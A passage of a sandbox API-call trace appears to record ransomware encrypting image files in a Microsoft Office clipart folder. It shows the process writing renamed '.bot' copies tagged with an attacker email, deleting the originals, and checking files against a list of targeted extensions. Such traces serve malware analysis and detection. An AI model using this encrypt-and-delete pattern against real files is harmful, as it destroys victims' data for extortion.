	[0153.599] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.599] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.599] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099185.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099185.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0153.599] GetLastError () returned 0x0
	[0153.599] ReadFile (in: hFile=0x38c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0xcd2, lpOverlapped=0x0) returned 1
	[0153.614] WriteFile (in: hFile=0x3b0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xce0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xce0, lpOverlapped=0x0) returned 1
	[0153.615] ReadFile (in: hFile=0x38c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.615] WriteFile (in: hFile=0x3b0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0153.615] SetEndOfFile (hFile=0x3b0) returned 1
	[0153.615] CloseHandle (hObject=0x3b0) returned 1
	[0153.615] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.615] SetEndOfFile (hFile=0x38c) returned 1
	[0153.617] CloseHandle (hObject=0x38c) returned 1
	[0153.617] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099185.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.618] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099185.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099185.jpg")) returned 1
	[0153.618] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099185.JPG") returned 63
	[0153.618] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099185.JPG") returned 63
	[0153.618] lstrlenW (lpString=".doc") returned 4
	[0153.618] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0153.618] lstrlenW (lpString=".docx") returned 5
	[0153.618] lstrcmpiW (lpString1=".docx", lpString2="5.JPG") returned -1
	[0153.618] lstrlenW (lpString=".pdf") returned 4
	[0153.618] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0153.619] lstrlenW (lpString=".xls") returned 4
	[0153.619] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0153.619] lstrlenW (lpString=".xlsx") returned 5
	[0153.619] lstrcmpiW (lpString1=".xlsx", lpString2="5.JPG") returned -1
	[0153.619] lstrlenW (lpString=".ppt") returned 4
	[0153.619] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0153.619] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099185.JPG") returned 63
	[0153.619] lstrlenW (lpString=".zip") returned 4
	[0153.619] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0153.619] lstrlenW (lpString=".rar") returned 4
	[0153.619] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0153.619] lstrlenW (lpString=".bz2") returned 4
	[0153.619] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0153.619] lstrlenW (lpString=".7z") returned 3
	[0153.619] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0153.619] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099185.JPG") returned 63
	[0153.619] lstrlenW (lpString=".dbf") returned 4
	[0153.619] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0153.619] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099185.JPG") returned 63
	[0153.619] lstrlenW (lpString=".1cd") returned 4
	[0153.619] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0153.619] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099185.JPG") returned 63
	[0153.619] lstrlenW (lpString=".jpg") returned 4
	[0153.619] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0153.619] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099185.JPG") returned 63
	[0153.619] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099185.JPG") returned 63
	[0153.619] lstrlenW (lpString=".doc") returned 4
	[0153.619] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0153.619] lstrlenW (lpString=".docx") returned 5
	[0153.619] lstrcmpiW (lpString1=".docx", lpString2="5.JPG") returned -1
	[0153.620] lstrlenW (lpString=".pdf") returned 4
	[0153.620] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0153.620] lstrlenW (lpString=".xls") returned 4
	[0153.620] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0153.620] lstrlenW (lpString=".xlsx") returned 5
	[0153.620] lstrcmpiW (lpString1=".xlsx", lpString2="5.JPG") returned -1
	[0153.620] lstrlenW (lpString=".ppt") returned 4
	[0153.620] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0153.620] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099185.JPG") returned 63
	[0153.620] lstrlenW (lpString=".zip") returned 4
	[0153.620] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0153.620] lstrlenW (lpString=".rar") returned 4
	[0153.620] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0153.620] lstrlenW (lpString=".bz2") returned 4
	[0153.620] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0153.620] lstrlenW (lpString=".7z") returned 3
	[0153.620] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0153.620] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099185.JPG") returned 63
	[0153.620] lstrlenW (lpString=".dbf") returned 4
	[0153.620] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0153.620] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099185.JPG") returned 63
	[0153.620] lstrlenW (lpString=".1cd") returned 4
	[0153.620] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0153.620] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099185.JPG") returned 63
	[0153.620] lstrlenW (lpString=".jpg") returned 4
	[0153.620] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0153.621] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0153.621] lstrlenW (lpString="J0099186.JPG") returned 12
	[0153.621] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099186.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099186.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0153.621] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=16738) returned 1
	[0153.621] CloseHandle (hObject=0x38c) returned 1
	[0153.621] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099186.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099186.jpg")) returned 0x20
	[0153.621] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099186.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099186.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.622] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099186.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099186.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0153.622] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.622] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.622] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099186.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099186.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0153.622] GetLastError () returned 0x0
	[0153.622] ReadFile (in: hFile=0x38c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x4162, lpOverlapped=0x0) returned 1
	[0153.970] WriteFile (in: hFile=0x3b0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x4170, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x4170, lpOverlapped=0x0) returned 1
	[0153.971] ReadFile (in: hFile=0x38c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.971] WriteFile (in: hFile=0x3b0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0153.971] SetEndOfFile (hFile=0x3b0) returned 1
	[0153.971] CloseHandle (hObject=0x3b0) returned 1
	[0153.972] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.972] SetEndOfFile (hFile=0x38c) returned 1
	[0153.976] CloseHandle (hObject=0x38c) returned 1
	[0153.977] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099186.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.977] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099186.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099186.jpg")) returned 1
	[0153.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099186.JPG") returned 63
	[0153.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099186.JPG") returned 63
	[0153.977] lstrlenW (lpString=".doc") returned 4
	[0153.977] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0153.978] lstrlenW (lpString=".docx") returned 5
	[0153.978] lstrcmpiW (lpString1=".docx", lpString2="6.JPG") returned -1
	[0153.978] lstrlenW (lpString=".pdf") returned 4
	[0153.978] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0153.978] lstrlenW (lpString=".xls") returned 4
	[0153.978] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0153.978] lstrlenW (lpString=".xlsx") returned 5
	[0153.978] lstrcmpiW (lpString1=".xlsx", lpString2="6.JPG") returned -1
	[0153.978] lstrlenW (lpString=".ppt") returned 4
	[0153.978] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0153.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099186.JPG") returned 63
	[0153.978] lstrlenW (lpString=".zip") returned 4
	[0153.978] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0153.978] lstrlenW (lpString=".rar") returned 4
	[0153.978] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0153.978] lstrlenW (lpString=".bz2") returned 4
	[0153.978] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0153.978] lstrlenW (lpString=".7z") returned 3
	[0153.978] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0153.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099186.JPG") returned 63
	[0153.978] lstrlenW (lpString=".dbf") returned 4
	[0153.978] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0153.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099186.JPG") returned 63
	[0153.978] lstrlenW (lpString=".1cd") returned 4
	[0153.978] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0153.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099186.JPG") returned 63
	[0153.978] lstrlenW (lpString=".jpg") returned 4
	[0153.978] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0153.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099186.JPG") returned 63
	[0153.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099186.JPG") returned 63
	[0153.979] lstrlenW (lpString=".doc") returned 4
	[0153.979] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0153.979] lstrlenW (lpString=".docx") returned 5
	[0153.979] lstrcmpiW (lpString1=".docx", lpString2="6.JPG") returned -1
	[0153.979] lstrlenW (lpString=".pdf") returned 4
	[0153.979] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0153.979] lstrlenW (lpString=".xls") returned 4
	[0153.979] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0153.979] lstrlenW (lpString=".xlsx") returned 5
	[0153.979] lstrcmpiW (lpString1=".xlsx", lpString2="6.JPG") returned -1
	[0153.979] lstrlenW (lpString=".ppt") returned 4
	[0153.979] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0153.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099186.JPG") returned 63
	[0153.979] lstrlenW (lpString=".zip") returned 4
	[0153.979] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0153.979] lstrlenW (lpString=".rar") returned 4
	[0153.979] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0153.979] lstrlenW (lpString=".bz2") returned 4
	[0153.979] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0153.979] lstrlenW (lpString=".7z") returned 3
	[0153.979] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0153.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099186.JPG") returned 63
	[0153.979] lstrlenW (lpString=".dbf") returned 4
	[0153.979] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0153.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099186.JPG") returned 63
	[0153.980] lstrlenW (lpString=".1cd") returned 4
	[0153.980] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0153.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099186.JPG") returned 63
	[0153.980] lstrlenW (lpString=".jpg") returned 4
	[0153.980] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0153.980] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0153.980] lstrlenW (lpString="J0099196.GIF") returned 12
	[0153.980] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099196.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099196.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298
	[0154.346] GetFileSizeEx (in: hFile=0x298, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=14337) returned 1
	[0154.346] CloseHandle (hObject=0x298) returned 1
	[0154.347] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099196.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099196.gif")) returned 0x20
	[0154.347] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099196.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099196.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0154.347] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099196.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099196.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298
	[0154.347] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.348] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.348] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099196.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099196.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x29c
	[0154.348] GetLastError () returned 0x0
	[0154.348] ReadFile (in: hFile=0x298, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x3801, lpOverlapped=0x0) returned 1
	[0154.471] WriteFile (in: hFile=0x29c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x3810, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x3810, lpOverlapped=0x0) returned 1
	[0154.472] ReadFile (in: hFile=0x298, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0154.472] WriteFile (in: hFile=0x29c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0154.473] SetEndOfFile (hFile=0x29c) returned 1
	[0154.487] CloseHandle (hObject=0x29c) returned 1
	[0154.487] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.488] SetEndOfFile (hFile=0x298) returned 1
	[0154.490] CloseHandle (hObject=0x298) returned 1
	[0154.490] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099196.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0154.791] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099196.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099196.gif")) returned 1
	[0154.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099196.GIF") returned 63
	[0154.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099196.GIF") returned 63
	[0154.815] lstrlenW (lpString=".doc") returned 4
	[0154.815] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0154.815] lstrlenW (lpString=".docx") returned 5
	[0154.815] lstrcmpiW (lpString1=".docx", lpString2="6.GIF") returned -1
	[0154.815] lstrlenW (lpString=".pdf") returned 4
	[0154.815] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0154.815] lstrlenW (lpString=".xls") returned 4
	[0154.815] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0154.815] lstrlenW (lpString=".xlsx") returned 5
	[0154.815] lstrcmpiW (lpString1=".xlsx", lpString2="6.GIF") returned -1
	[0154.815] lstrlenW (lpString=".ppt") returned 4
	[0154.815] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0154.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099196.GIF") returned 63
	[0154.815] lstrlenW (lpString=".zip") returned 4
	[0154.815] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0154.815] lstrlenW (lpString=".rar") returned 4
	[0154.815] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0154.815] lstrlenW (lpString=".bz2") returned 4
	[0154.815] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0154.815] lstrlenW (lpString=".7z") returned 3
	[0154.815] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0154.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099196.GIF") returned 63
	[0154.815] lstrlenW (lpString=".dbf") returned 4
	[0154.815] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0154.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099196.GIF") returned 63
	[0154.815] lstrlenW (lpString=".1cd") returned 4
	[0154.815] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0154.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099196.GIF") returned 63
	[0154.815] lstrlenW (lpString=".jpg") returned 4
	[0154.815] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0154.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099196.GIF") returned 63
	[0154.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099196.GIF") returned 63
	[0154.816] lstrlenW (lpString=".doc") returned 4
	[0154.816] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0154.816] lstrlenW (lpString=".docx") returned 5
	[0154.816] lstrcmpiW (lpString1=".docx", lpString2="6.GIF") returned -1
	[0154.816] lstrlenW (lpString=".pdf") returned 4
	[0154.816] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0154.816] lstrlenW (lpString=".xls") returned 4
	[0154.816] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0154.816] lstrlenW (lpString=".xlsx") returned 5
	[0154.816] lstrcmpiW (lpString1=".xlsx", lpString2="6.GIF") returned -1
	[0154.816] lstrlenW (lpString=".ppt") returned 4
	[0154.816] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0154.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099196.GIF") returned 63
	[0154.816] lstrlenW (lpString=".zip") returned 4
	[0154.816] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0154.816] lstrlenW (lpString=".rar") returned 4
	[0154.816] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0154.816] lstrlenW (lpString=".bz2") returned 4
	[0154.816] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0154.816] lstrlenW (lpString=".7z") returned 3
	[0154.816] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0154.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099196.GIF") returned 63
	[0154.816] lstrlenW (lpString=".dbf") returned 4
	[0154.816] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0154.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099196.GIF") returned 63
	[0154.816] lstrlenW (lpString=".1cd") returned 4
	[0154.816] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0154.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099196.GIF") returned 63
	[0154.816] lstrlenW (lpString=".jpg") returned 4
	[0154.816] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0154.817] lstrcmpiW (lpString1=".BMP", lpString2=".bot") returned -1
	[0154.817] lstrlenW (lpString="J0101856.BMP") returned 12
	[0154.817] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101856.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101856.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0154.870] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=78840) returned 1
	[0154.870] CloseHandle (hObject=0x3a0) returned 1
	[0154.870] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101856.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101856.bmp")) returned 0x20
	[0154.871] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101856.BMP.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101856.bmp.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0154.881] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101856.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101856.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0154.893] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.893] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
